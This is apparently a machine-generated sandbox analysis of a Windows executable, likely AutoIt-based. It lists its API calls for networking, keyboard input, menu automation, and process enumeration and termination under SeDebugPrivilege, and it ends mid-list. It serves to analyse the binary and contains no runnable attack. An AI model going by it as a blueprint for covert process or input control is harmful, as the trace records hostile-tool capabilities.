                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                      • String ID:
                                      • API String ID: 1282221369-0
                                      APIs
                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00525186
                                      • ShowWindow.USER32(?,00000000), ref: 005251C7
                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 005251CD
                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 005251D1
                                        • Part of subcall function 00526FBA: DeleteObject.GDI32(00000000), ref: 00526FE6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0052520D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0052521A
                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0052524D
                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00525287
                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00525296
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                      • String ID:
                                      • API String ID: 3210457359-0
                                      APIs
                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 004E6890
                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004E68A9
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004E68B9
                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004E68D1
                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004E68F2
                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004A8874,00000000,00000000,00000000,000000FF,00000000), ref: 004E6901
                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 004E691E
                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,004A8874,00000000,00000000,00000000,000000FF,00000000), ref: 004E692D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                      • String ID:
                                      • API String ID: 1268354404-0
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0050C182
                                      • GetLastError.KERNEL32 ref: 0050C195
                                      • SetEvent.KERNEL32(?), ref: 0050C1A9
                                        • Part of subcall function 0050C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0050C272
                                        • Part of subcall function 0050C253: GetLastError.KERNEL32 ref: 0050C322
                                        • Part of subcall function 0050C253: SetEvent.KERNEL32(?), ref: 0050C336
                                        • Part of subcall function 0050C253: InternetCloseHandle.WININET(00000000), ref: 0050C341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 337547030-0
                                      APIs
                                        • Part of subcall function 004F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F3A57
                                        • Part of subcall function 004F3A3D: GetCurrentThreadId.KERNEL32 ref: 004F3A5E
                                        • Part of subcall function 004F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004F25B3), ref: 004F3A65
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004F25BD
                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004F25DB
                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004F25DF
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004F25E9
                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004F2601
                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004F2605
                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 004F260F
                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004F2623
                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004F2627
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                      • String ID:
                                      • API String ID: 2014098862-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004F1449,?,?,00000000), ref: 004F180C
                                      • HeapAlloc.KERNEL32(00000000,?,004F1449,?,?,00000000), ref: 004F1813
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004F1449,?,?,00000000), ref: 004F1828
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,004F1449,?,?,00000000), ref: 004F1830
                                      • DuplicateHandle.KERNEL32(00000000,?,004F1449,?,?,00000000), ref: 004F1833
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004F1449,?,?,00000000), ref: 004F1843
                                      • GetCurrentProcess.KERNEL32(004F1449,00000000,?,004F1449,?,?,00000000), ref: 004F184B
                                      • DuplicateHandle.KERNEL32(00000000,?,004F1449,?,?,00000000), ref: 004F184E
                                      • CreateThread.KERNEL32(00000000,00000000,004F1874,00000000,00000000,00000000), ref: 004F1868
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      APIs
                                        • Part of subcall function 004FD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 004FD501
                                        • Part of subcall function 004FD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 004FD50F
                                        • Part of subcall function 004FD4DC: CloseHandle.KERNEL32(00000000), ref: 004FD5DC
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051A16D
                                      • GetLastError.KERNEL32 ref: 0051A180
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0051A1B3
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0051A268
                                      • GetLastError.KERNEL32(00000000), ref: 0051A273
                                      • CloseHandle.KERNEL32(00000000), ref: 0051A2C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00523925
                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0052393A
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00523954
                                      • _wcslen.LIBCMT ref: 00523999
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 005239C6
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 005239F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$Window_wcslen
                                      • String ID: SysListView32
                                      • API String ID: 2147712094-78025650
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004FBCFD
                                      • IsMenu.USER32(00000000), ref: 004FBD1D
                                      • CreatePopupMenu.USER32 ref: 004FBD53
                                      • GetMenuItemCount.USER32(011852D8), ref: 004FBDA4
                                      • InsertMenuItemW.USER32(011852D8,?,00000001,00000030), ref: 004FBDCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID: 0$2
                                      • API String ID: 93392585-3793063076
                                      • Opcode ID: 09107838a731eac029ba7b29bfa7195a309dd43e11e16d04a4c44b4bc1b2c975
                                      • Instruction ID: cbc4b63bf542a2991a737699976b8e3702f456152995620b364aae9ffb38a1d5
                                      • Opcode Fuzzy Hash: 09107838a731eac029ba7b29bfa7195a309dd43e11e16d04a4c44b4bc1b2c975
                                      • Instruction Fuzzy Hash: 8551EF70A0020D9BDB21CFA9C884BBEBBF5EF46314F14411AEA41D7391D7789945CBAA
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 004B2D4B
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 004B2D53
                                      • _ValidateLocalCookies.LIBCMT ref: 004B2DE1
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004B2E0C
                                      • _ValidateLocalCookies.LIBCMT ref: 004B2E61
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: &HK$csm
                                      • API String ID: 1170836740-116087588
                                      • Opcode ID: 31a54df242adbd4b43b9a457b58ada36a52021bf85a1a4534314e54be61a5217
                                      • Instruction ID: 98edc7324cd391645f921f19c187f8ee831b5733307af96b50947bdd132bb048
                                      • Opcode Fuzzy Hash: 31a54df242adbd4b43b9a457b58ada36a52021bf85a1a4534314e54be61a5217
                                      • Instruction Fuzzy Hash: C541D334A00208ABCF10EF69C954ADEBBB4FF44318F14805BE8146B392D779AA05CBA5
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 004FC913
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 8229f7cd78478c5459f5876e59a7b82941f02e364c975a2c7989827266d58c47
                                      • Instruction ID: 99e21fd7a4107bc63695461bf627ddce1e94a0258faa3849221df53bd005873b
                                      • Opcode Fuzzy Hash: 8229f7cd78478c5459f5876e59a7b82941f02e364c975a2c7989827266d58c47
                                      • Instruction Fuzzy Hash: F9110B7178930EBAEB0467549DC2CBB679CDF19355B50002FF600A6282D7A99E05526D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen$LocalTime
                                      • String ID:
                                      • API String ID: 952045576-0
                                      • Opcode ID: 4f26b9b3d4181272efbe2d2316ea7ae4f216de4fab0eab54bdec891f2ee9157e
                                      • Instruction ID: a6b6b991f04a06808cedfe5ef6cf561abda7a3bb6fd302bf45b303dc475e8a91
                                      • Opcode Fuzzy Hash: 4f26b9b3d4181272efbe2d2316ea7ae4f216de4fab0eab54bdec891f2ee9157e
                                      • Instruction Fuzzy Hash: BE41A365C1011876DB11EBB68C8A9DFB7A8AF45310F5084ABE614E3162FB3CD245C3BD
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 004AF953
                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 004EF3D1
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004E682C,00000004,00000000,00000000), ref: 004EF454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: aea597216c85a61f7831ad296deafaa78dd0662c78413520174009f863a9ef8e
                                      • Instruction ID: 3942f7e9276a24f534aedfe7452354b8f8673603fab1fab9c5a355c0be991dd3
                                      • Opcode Fuzzy Hash: aea597216c85a61f7831ad296deafaa78dd0662c78413520174009f863a9ef8e
                                      • Instruction Fuzzy Hash: 4E4159B0204680BAC7748B6E888873B7F99AF77315F58443FE04753661C63DA88DDB5A
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00522D1B
                                      • GetDC.USER32(00000000), ref: 00522D23
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00522D2E
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00522D3A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00522D76
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00522D87
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00525A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00522DC2
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00522DE1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: e3086ab1e8bd953f964fbe45bc7e6cf845cc9db2fd2d3cfe549032e6398194b8
                                      • Instruction ID: fed0fd0f7c14f5f65db2a49381365d2b503d79b69a0583769dcc01435d600929
                                      • Opcode Fuzzy Hash: e3086ab1e8bd953f964fbe45bc7e6cf845cc9db2fd2d3cfe549032e6398194b8
                                      • Instruction Fuzzy Hash: F5318F76101224BBEB214F549C89FEB3FA9FF1A711F044055FE089A192C6759C56C7A4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 0d223f1a09614a0ac17ff6a439fa01571dcfeb8f5f82b01c6c8cbe6242f8fb62
                                      • Instruction ID: 048b1eb3ead5068adaad17a95c130e39ae2a4d093bff0b81b36b5ca4ea4c9213
                                      • Opcode Fuzzy Hash: 0d223f1a09614a0ac17ff6a439fa01571dcfeb8f5f82b01c6c8cbe6242f8fb62
                                      • Instruction Fuzzy Hash: F721867164491D77B6146611AD92FFB339CAE21388F840036FF19DAA81F728ED1182AD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 37bde2526adc3e18b41b9c6b3f7b780a57baa6173616b4b5095bc35b890a9491
                                      • Instruction ID: 53264360db6fafc02e24be3dadda25cd9b63f13f776c54e7b87d99e31491a8ae
                                      • Opcode Fuzzy Hash: 37bde2526adc3e18b41b9c6b3f7b780a57baa6173616b4b5095bc35b890a9491
                                      • Instruction Fuzzy Hash: 81D1B775A0060ADFEF10CF98D885BEEBBB5BF88344F148469E915AB281E770DD85CB50
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 004D15CE
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D1651
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,004D17FB,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D16E4
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D16FB
                                        • Part of subcall function 004C3820: RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004D17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 004D1777
                                      • __freea.LIBCMT ref: 004D17A2
                                      • __freea.LIBCMT ref: 004D17AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 2829977744-0
                                      • Opcode ID: e03c339712c53286618b479f2727a51bca3e896a2e0790e688c01f6d93fc57ab
                                      • Instruction ID: 8e850e0db08a7e3316ac76823730b9e6cafcb25ace1e91f395062ec01747fda7
                                      • Opcode Fuzzy Hash: e03c339712c53286618b479f2727a51bca3e896a2e0790e688c01f6d93fc57ab
                                      • Instruction Fuzzy Hash: AB91C271E00206BADB208E64D9A1EEF7BB5AF49310F18465BEC05E7361D72DCC45CB68
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Variant$ClearInit
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2610073882-625585964
                                      • Opcode ID: 7cfcc631fc8653054aa70ad0dd1d3ecc510c38b7f8b8cc59a20821194326b613
                                      • Instruction ID: 2c986db9df6ad7758a50a5a10314707b70780cac0bba3abe2986fc236e4e71cd
                                      • Opcode Fuzzy Hash: 7cfcc631fc8653054aa70ad0dd1d3ecc510c38b7f8b8cc59a20821194326b613
                                      • Instruction Fuzzy Hash: C6917F71A00219ABEF20CFA5D884FEEBFB8FF46715F108559E505AB281D7709985CFA0
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0050125C
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00501284
                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 005012A8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005012D8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0050135F
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 005013C4
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00501430
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                      • String ID:
                                      • API String ID: 2550207440-0
                                      • Opcode ID: d351fd5ce0de5ca215494ad44a544abf98448e45df624c4422e49f4ede536f66
                                      • Instruction ID: 02e89fb3775a7464cb81a9a9723d7ced6ba7d4a0856150ad60e7e6c238d61970
                                      • Opcode Fuzzy Hash: d351fd5ce0de5ca215494ad44a544abf98448e45df624c4422e49f4ede536f66
                                      • Instruction Fuzzy Hash: AA913375A00609AFDB00DF95C884BBEBBB5FF45315F10442AE900EB2E1D778E941CB9A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 31aa14c93ba5252c4a1aff9f9073537a6bb9a3ce034e5ceac43e08313f818226
                                      • Instruction ID: 19f69b2535e49ecf9cc5f87912216c538ade62f71d7f40eab00e188eb94b29ab
                                      • Opcode Fuzzy Hash: 31aa14c93ba5252c4a1aff9f9073537a6bb9a3ce034e5ceac43e08313f818226
                                      • Instruction Fuzzy Hash: 18913771D00219AFCB10CFA9C885AEEBBB9FF4A320F14444AE915B7251D378AD42CB64
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0051396B
                                      • CharUpperBuffW.USER32(?,?), ref: 00513A7A
                                      • _wcslen.LIBCMT ref: 00513A8A
                                      • VariantClear.OLEAUT32(?), ref: 00513C1F
                                        • Part of subcall function 00500CDF: VariantInit.OLEAUT32(00000000), ref: 00500D1F
                                        • Part of subcall function 00500CDF: VariantCopy.OLEAUT32(?,?), ref: 00500D28
                                        • Part of subcall function 00500CDF: VariantClear.OLEAUT32(?), ref: 00500D34
                                      Strings
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4137639002-1221869570
                                      • Opcode ID: e5198a1855f6927c7d62ad331bd482a3701b6d2ec731d41dad60bcda65bb6253
                                      • Instruction ID: 6fbf4751223d1b1d3637f058ff1be6d047ca0d29c9b67a201bd0d5823be0342e
                                      • Opcode Fuzzy Hash: e5198a1855f6927c7d62ad331bd482a3701b6d2ec731d41dad60bcda65bb6253
                                      • Instruction Fuzzy Hash: 4E916C746083059FDB00DF29C49496ABBE4FF89318F14886EF88A97351DB34EE45CB92
                                      APIs
                                        • Part of subcall function 004F000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?,?,004F035E), ref: 004F002B
                                        • Part of subcall function 004F000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0046
                                        • Part of subcall function 004F000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?,?), ref: 004F0054
                                        • Part of subcall function 004F000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,004EFF41,80070057,?), ref: 004F0064
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00514C51
                                      • _wcslen.LIBCMT ref: 00514D59
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00514DCF
                                      • CoTaskMemFree.OLE32(?), ref: 00514DDA
                                      Strings
                                      Similarity
                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 614568839-2785691316
                                      • Opcode ID: ba47b960c1b9254b643f8f7e7b1339fdbf573433a3b00738b74c271818962140
                                      • Instruction ID: cc6d2a32f63936b5818cde8a69c4f427a1a295cbe76abf970a0e4e522709eaa9
                                      • Opcode Fuzzy Hash: ba47b960c1b9254b643f8f7e7b1339fdbf573433a3b00738b74c271818962140
                                      • Instruction Fuzzy Hash: FC912871D0021D9FEF10DFA5D891AEEBBB9BF08304F10856AE915A7251DB345E45CFA0
                                      APIs
                                      • GetMenu.USER32(?), ref: 00522183
                                      • GetMenuItemCount.USER32(00000000), ref: 005221B5
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005221DD
                                      • _wcslen.LIBCMT ref: 00522213
                                      • GetMenuItemID.USER32(?,?), ref: 0052224D
                                      • GetSubMenu.USER32(?,?), ref: 0052225B
                                        • Part of subcall function 004F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004F3A57
                                        • Part of subcall function 004F3A3D: GetCurrentThreadId.KERNEL32 ref: 004F3A5E
                                        • Part of subcall function 004F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004F25B3), ref: 004F3A65
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005222E3
                                        • Part of subcall function 004FE97B: Sleep.KERNEL32 ref: 004FE9F3
                                      Similarity
                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                      • String ID:
                                      • API String ID: 4196846111-0
                                      • Opcode ID: d1ad8f24be1fd12fd39eb176fa737cb14856e19f922844c098a351d4cf1b33a9
                                      • Instruction ID: 1fed83c405e98b8859530e6f73bd4dcf20e2cee78a01d3f876fb2ff553814198
                                      • Opcode Fuzzy Hash: d1ad8f24be1fd12fd39eb176fa737cb14856e19f922844c098a351d4cf1b33a9
                                      • Instruction Fuzzy Hash: 53718E79A00215EFCB14DFA5D881AAEBBF1FF49314F108469E816EB391D735E941CB90
                                      APIs
                                      • GetParent.USER32(?), ref: 004FAEF9
                                      • GetKeyboardState.USER32(?), ref: 004FAF0E
                                      • SetKeyboardState.USER32(?), ref: 004FAF6F
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004FAF9D
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004FAFBC
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 004FAFFD
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004FB020
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: fdec7ade6afea0e9181c2f3fc38c4c82930d98769247e75d362498a0724549ba
                                      • Instruction ID: 0a1b0a3015fbd5b714a06ab49f271d5c0eedb0b7cd74a74467b4a5ac4ae72e27
                                      • Opcode Fuzzy Hash: fdec7ade6afea0e9181c2f3fc38c4c82930d98769247e75d362498a0724549ba
                                      • Instruction Fuzzy Hash: D751B4E06047D93DFB364234CC45BBB7EA99B06304F08858AE2D9595C2C79CACD8D7A9
                                      APIs
                                      • GetParent.USER32(00000000), ref: 004FAD19
                                      • GetKeyboardState.USER32(?), ref: 004FAD2E
                                      • SetKeyboardState.USER32(?), ref: 004FAD8F
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004FADBB
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004FADD8
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004FAE17
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004FAE38
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: ae6e9d701c1d2ac717755aa1433675c02584003452329039f15e483cc2dd3bb4
                                      • Instruction ID: 0c7e18a7887c0311f88097ffa44ab61d56bcf180247a0ee27acb2eccbbceb73c
                                      • Opcode Fuzzy Hash: ae6e9d701c1d2ac717755aa1433675c02584003452329039f15e483cc2dd3bb4
                                      • Instruction Fuzzy Hash: 9A51D6E15447D93DFB368224CC45B7B7E99AB46304F08848AE2DD469C2C398ECA8D75A
                                      APIs
                                      • GetConsoleCP.KERNEL32(004D3CD6,?,?,?,?,?,?,?,?,004C5BA3,?,?,004D3CD6,?,?), ref: 004C5470
                                      • __fassign.LIBCMT ref: 004C54EB
                                      • __fassign.LIBCMT ref: 004C5506
                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,004D3CD6,00000005,00000000,00000000), ref: 004C552C
                                      • WriteFile.KERNEL32(?,004D3CD6,00000000,004C5BA3,00000000,?,?,?,?,?,?,?,?,?,004C5BA3,?), ref: 004C554B
                                      • WriteFile.KERNEL32(?,?,00000001,004C5BA3,00000000,?,?,?,?,?,?,?,?,?,004C5BA3,?), ref: 004C5584
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: f9017e0a28e2e03a2e3158579e2798d84e8601a392e03f31f87fe9a7013954f1
                                      • Instruction ID: 17bf2a3a51d9b946ea84698eab94dbb6a81a6fc61b91c5bd06fb0e326c6bbeb3
                                      • Opcode Fuzzy Hash: f9017e0a28e2e03a2e3158579e2798d84e8601a392e03f31f87fe9a7013954f1
                                      • Instruction Fuzzy Hash: E851C1B4A00608AFDB20CFA8D845FEEBBF9EF19300F14451FE555E7291D674AA81CB64
                                      APIs
                                        • Part of subcall function 0051304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0051307A
                                        • Part of subcall function 0051304E: _wcslen.LIBCMT ref: 0051309B
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00511112
                                      • WSAGetLastError.WSOCK32 ref: 00511121
                                      • WSAGetLastError.WSOCK32 ref: 005111C9
                                      • closesocket.WSOCK32(00000000), ref: 005111F9
                                      Similarity
                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 2675159561-0
                                      • Opcode ID: 5dff4bc10a4b371178368bd8ab4b8fbf4af816dcc5ab94d050df44d464253385
                                      • Instruction ID: 14522c4c63bfe84381aa67a333ffc6544038fd92340289a2ba9dece3d913565f
                                      • Opcode Fuzzy Hash: 5dff4bc10a4b371178368bd8ab4b8fbf4af816dcc5ab94d050df44d464253385
                                      • Instruction Fuzzy Hash: 9E41C631600604AFEB109F14C884BE9BFE9FF45368F148059FA159B292D774AD85CBE5
                                      APIs
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004FCF22,?), ref: 004FDDFD
                                        • Part of subcall function 004FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004FCF22,?), ref: 004FDE16
                                      • lstrcmpiW.KERNEL32(?,?), ref: 004FCF45
                                      • MoveFileW.KERNEL32(?,?), ref: 004FCF7F
                                      • _wcslen.LIBCMT ref: 004FD005
